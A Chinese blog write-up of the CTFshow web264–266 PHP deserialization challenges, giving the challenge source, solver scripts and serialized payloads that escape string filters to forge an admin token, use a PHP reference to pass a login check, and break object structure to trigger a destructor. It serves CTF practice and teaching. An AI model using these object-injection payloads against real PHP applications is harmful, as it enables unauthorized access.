CTFshow web(php反序列化264-266)

最新推荐文章于 2024-05-06 11:34:06 发布
最新推荐文章于 2024-05-06 11:34:06 发布
阅读量1.1k 收藏 31
点赞数 16
文章标签: 前端 php CTFshow web安全 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csjjjd/article/details/136221207
版权

                                                                        web264

<?php

error_reporting(0);
session_start();

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    $_SESSION['msg']=base64_encode($umsg);
    echo 'Your message has been sent';
}

highlight_file(__FILE__);


这道题目应该看一眼就应该看到思路了,为什么?$umsg = str_replace('fuck', 'loveU', serialize($msg));

这里就是典型的字符串逃逸

<?php


# @message.php


error_reporting(0);
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}

highlight_file(__FILE__);


字符串逃逸特征: $umsg = str_replace('fuck', 'loveU', serialize($msg));

做这种题就三步走,千万别给自己加戏!

第一步:先拿到以个正常最初的反序列化:

代码如下

<?php

class message{

    public $from;
    public $msg;
    public $to;
    public $token='admin';
    public function __construct($f,$m,$t){
        $this->from=$f;
        $this->msg = $m;
        $this->to=$t;
        }
        }
function filter($msg){
    return str_replace('fuck','loveU',$msg);
}
$msg=new message('a','b','c');

$msg_1=serialize($msg);

echo $msg_1;
O:7:"message":4:{s:4:"from";s:1:"a";s:3:"msg";N;s:2:"to";s:1:"c";s:5:"token";s:4:"user";}
 

第二步:使用filter进行一次字符串逃逸。

<?php

class message{

    public $from;
    public $msg;
    public $to;
    public $token='admin';
    public function __construct($f,$m,$t){
        $this->from=$f;
        $this->to=$t;
        }
        }
function filter($msg){
    return str_replace('fuck','loveU',$msg);
}
$msg=new message('fuck','b','c');

$msg_1=serialize($msg);

$msg_2=filter($msg_1);

echo $msg_2;
O:7:"message":4:{s:4:"from";s:4:"loveU";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"admin";}
第三步:算出要逃逸的次数进行复制输出

s:4:"loveU"很明显逃逸一个字符,因为每次逃逸一个字符,";s:5:"token";s:5:"admin";}这里有27个字符要逃逸,所以必须复制27次fuck,还有这得改成:";s:5:"token";s:5:"admin";},因为后面需要admin权限。

简单来说就是数出";s:5:"token";s:5:"admin";}这里有几个字符,然后输出一共几个fuck,再把";s:5:"token";s:5:"admin";}丢到fuck后面就完成了。

<?php
class message{
    public  $from;
public $msg;
public $to;
public $token='admin';
public function __construct($f,$m,$t){
$this->from = $f;
$this->msg = $m;
$this->to = $t;
}
}
function filter($msg){
    return str_replace('fuck','loveU',$msg);
}

$msg = new message('a','b','fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}');

$msg_1=serialize($msg);

$msg_2=filter($msg_1);
echo $msg_2;

结果:
O:7:"message":4:{s:4:"from";s:1:"a";s:3:"msg";s:1:"b";s:2:"to";s:135:"loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU";s:5:"token";s:5:"admin";}";s:5:"token";s:5:"admin";}

最后的最后,再进行一次总结:字符串逃逸有三步:

1.拿到正常序列化后字符串。(这个题目都会给·代码你,直接复制然后反序列化就好,没什么技术含量)

2.使用filter进行一次字符串逃逸。

3.第三步:算出要逃逸的次数进行复制输出(但是这里一定要提醒大家一下,字符串逃逸分为增多和减少,苦于篇幅上面我只介绍了一种增多,另外一种也是可以使用本方法的,只是有些地方要改一下而已)

                                                                                web265

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
include('flag.php');
highlight_file(__FILE__);
class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct($t,$p){
        $this->token=$t;
        $this->password = $p;
    }
    public function login(){
        return $this->token===$this->password;
    }
}

$ctfshow = unserialize($_GET['ctfshow']);
$ctfshow->token=md5(mt_rand());

if($ctfshow->login()){
    echo $flag;
}

我曾经写过一篇做反序列化的基础操作和方法文章:https://blog.csdn.net/csjjjd/article/details/135549767

第一步:怎么输出flag?

答:

if($ctfshow->login()){
    echo $flag;
}

第二步:我能控制啥?

答:ctfshow

第三步:

这段代码正常执行时的顺序是什么?

将ctfshw进行反序列化,然后不触发任何魔术方法,然后结束

第四步:

要执行恶意代码,该怎么做?(即为通过我所能控制的东西,如何才能执行恶意代码?)

这里有一个很好用的方法:逆推法

问:怎么echo flag?

答:必须$ctfshow->login()

问:怎么做到$ctfshow->login()

答:login 方法用于判断 $token 是否等于 $password

问:怎么做到$token等于 $password

答:让他们指向同一块内存

好,分析完毕

第五步:分析完毕,开始构造代码

<?php
class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct($t,$p){
        $this->token=$t;
        $this->password = &$this->token;//其实就是这个地方让他们指向同一个地址,让他们相等,其他地方直接照搬下来就好
    }
    public function login(){
        return $this->token===$this->password;
    }
}
$a=new ctfshowAdmin('1','2');

echo serialize($a);

payload:

O:12:"ctfshowAdmin":2:{s:5:"token";s:1:"1";s:8:"password";R:2;}

                                                                        web266

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

highlight_file(__FILE__);

include('flag.php');
$cs = file_get_contents('php://input');


class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function login(){
        return $this->username===$this->password;
    }
    public function __toString(){
        return $this->username;
    }
    public function __destruct(){
        global $flag;
        echo $flag;
    }
}
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
    throw new Exception("Error $ctfshowo",1);
}

第一步:怎么输出flag?

答:   public function __destruct(){
        global $flag;
        echo $flag;
    }

第二步:我能控制啥?

代码这里没有显示,这种情况下那估计得往bp里面写东西了

第三步:

这段代码正常执行时的顺序是什么?

$ctfshowo=@unserialize($cs);
就这个,然后结束

第四步:要执行恶意代码,该怎么做?

还是逆推,我得销毁对象然后触发__destruct()魔术方法, 但是后面有报错异常,所以这里得让类名存在,但是还得使得里面内容反序列化失败。所以这里得破坏他的反序列化结构,但是不破坏类名

第五步:构造代码:

<?php
class ctfshow
{
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';

    public function __construct($u, $p)
    {
        $this->username = $u;
        $this->password = $p;
    }

    public function login()
    {
        return $this->username === $this->password;
    }

    public function __toString()
    {
        return $this->username;
    }
}
$admin = new ctfshow('123','123');
echo serialize(($admin));

其实就是进行一个正常的反序列化

O:7:"ctfshow":2:{s:8:"username";s:1:"1";s:8:"password";s:1:"2";}

接下来把里面的内容换成类名就好了

O:7:"ctfshow":2:{ctfshow}

在bp上面提交就好

真诚希望我的文章能够帮助大家!

补天阁
关注
CTFshow 反序列化 web264
Kradress的博客
02-11 1239
目录源码思路题解总结 源码 index.php <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-03 02:37:19 # @Last Modified by: h1xa # @Last Modified time: 2020-12-03 16:05:38 | # @message.php
CTFshow 反序列化 web266
Kradress的博客
02-11 728
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-04 23:52:24 # @Last Modified by: h1xa # @Last Modified time: 2020-12-05 00:17:08 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ highlight_file(__FILE__); in
ctfshow-web266(反序列化)
m0_62094846的博客
02-28 550
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-04 23:52:24 # @Last Modified by: h1xa # @Last Modified time: 2020-12-05 00:17:08 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ highlight_file(__FILE__); include('flag.ph.
ctfshow web264
qq_74409805的博客
03-30 896
php反序列化 web 字符串逃逸
ctfshow web入门 php序列化 web260--web266
最新发布
2301_81040377的博客
05-06 337
在前面加上 ‘|’, 这样的话 session 反序列化的时候 php handler 会默认把 ‘|’ 前面的内容当做 key, 不会解析, ‘|’ 后面的才是真正应该反序列化的 value。注意heckbar是不能直接传值的,必须传键值对,所以我们用bp发包。注意数清楚fuck的个数,我就是少了一个。正则看序列化之后的ctfshow有没有。构造password=token即可。这里有两种写法,赋值的时候注意一定要。类名不能是ctfshow,然后。我们在POST传的值就是$cs。是拼接,然后就有马了。
【CTFSHOW】web入门反序列化
7ruth0hn的博客
07-25 3524
web254 include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this
CTFshow 反序列化 web257
Kradress的博客
12-19 1933
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 20:33:07 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
CTFshow 反序列化 web262
Kradress的博客
12-20 2684
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-03 02:37:19 # @Last Modified by: h1xa # @Last Modified time: 2020-12-03 16:05:38 # @message.php # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporti
CTFshow 反序列化 web263
Kradress的博客
12-20 1365
目录源码思路题解总结 源码 也没有什么别的信息,扫一下目录,下载www.zip拿到源码 思路 知识点: php在session存储和读取时,都会有一个序列化和反序列化的过程,PHP内置了多种处理器用于存取$_SESSION数据,都会对数据序列化和反序列化,源码中有session_start的时候会读取session,从而进行反序列化. php . ini 中默认 session.serialize_handler 为 php_serialize,而 index.php 中将其设置为 php ,这个差
[ctfshow]web入门——反序列化web261+web264-web267)
ShenZ的博客
03-02 6342
[ctfshow]web入门——反序列化 反序列化 unserialization [ctfshow]web入门——反序列化 web261 web264 str_replace字符串覆盖逃逸 web265 web266 web267 yii系列 反序列化 unserialization[ctfshow]web入门——反序列化
ctfshow web入门 反序列化 前篇 254-266
m0_64815693的博客
04-08 1861
ctfshow web入门 反序列化 254-278
ctf_show笔记篇(web入门---反序列化
whale_waves的博客
03-19 1852
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变化, $a是什么$b就是什么。利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列化, php就会自动把|前面的当作键名用, 反而会反序列化|后的值。
CTFshow 反序列化 web265
Kradress的博客
02-11 832
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-04 23:52:24 # @Last Modified by: h1xa # @Last Modified time: 2020-12-05 00:17:08 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); include('
ctfshow—反序列化
cosmoslin的博客
11-15 2185
简介 序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化php 将数据序列化和反序列化会用到两个函数 serialize 将对象格式化成有序的字符串 unserialize 将字符串还原成原来的对象 序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的魔术方法 __construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用
ctfshow 反序列化2
qq_61768489的博客
07-13 425
PHP的session反序列化 带你走进PHP session反序列化漏洞 - 先知社区 原理解释不错 CTFshow-web入门-反序列化_哔哩哔哩_bilibili 可参考CTFshow 反序列化 web263_Kradress的博客-CSDN博客 在index.php中 的键值写错了,那就可以通过COOKIE来控制的值,从而进行当前页面的反序列化在check.php中,引用了inc.php 在inc.php中出现关键函数可以写入文件 构造payload 开始构造payload: 从关键的
ctfshow反序列化模块
whisper921的博客
04-07 6233
web254 GET传参即可: ?username=xxxxxx&password=xxxxxx 得到flag ctfshow{03b60d01-62ef-4703-8217-684bb53b866a} web255 web256 把PHP里面的username和password改成不一样的即可,然后和get传入的对应。 web257 web258 web259 web260 ...
Ctfshow 反序列化
qq_74806534的博客
03-17 1686
SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。SSTI就是服务器端模板注入SSTI也是,其成因其实是可以类比于sql注入的。sql注入是从用户获得一个输入,然后后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。SSTI也是获取了一个输入,然后在后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,
ctfshow-web265(反序列化)
m0_62094846的博客
02-28 506
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-04 23:52:24 # @Last Modified by: h1xa # @Last Modified time: 2020-12-05 00:17:08 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); include('flag.php'); hi.
PHP中的MD5()函数漏洞
John_lain的博客
10-28 3847
文章目录1. MD5函数漏洞2.PHP特性3.MD5碰撞 1. MD5函数漏洞 $_GET['a'] != $_GET['b'] &amp;&amp; MD5($_GET['a']) == MD5($_GET['b']) 要让上面的等式成立,a和b的值不能相等,但是md5后的值相等。因为是==比较,只判断值是否相等,不判断类型是否相同。如果类型不同先转换为相同类型再进行比较而PHP在处理哈希字...
深入理解PHP反序列化机制
"PHP反序列化详解,包括serialize()函数的使用,以及序列化过程的解析和示例" PHP反序列化PHP编程中的一个重要概念,它与序列化相反,是将通过序列化保存的字符串恢复成原始的PHP变量。在PHP中,`serialize()`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值